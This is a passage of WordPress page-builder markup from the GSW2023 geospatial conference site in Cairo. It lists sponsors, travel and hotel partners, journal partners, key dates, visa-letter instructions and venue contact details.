rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" />\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner]</p>\r\n[vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\">\r\n</a>[/vc_column_text][/vc_column_inner]</p>\r\n<p style=\"text-align: center;\">[vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 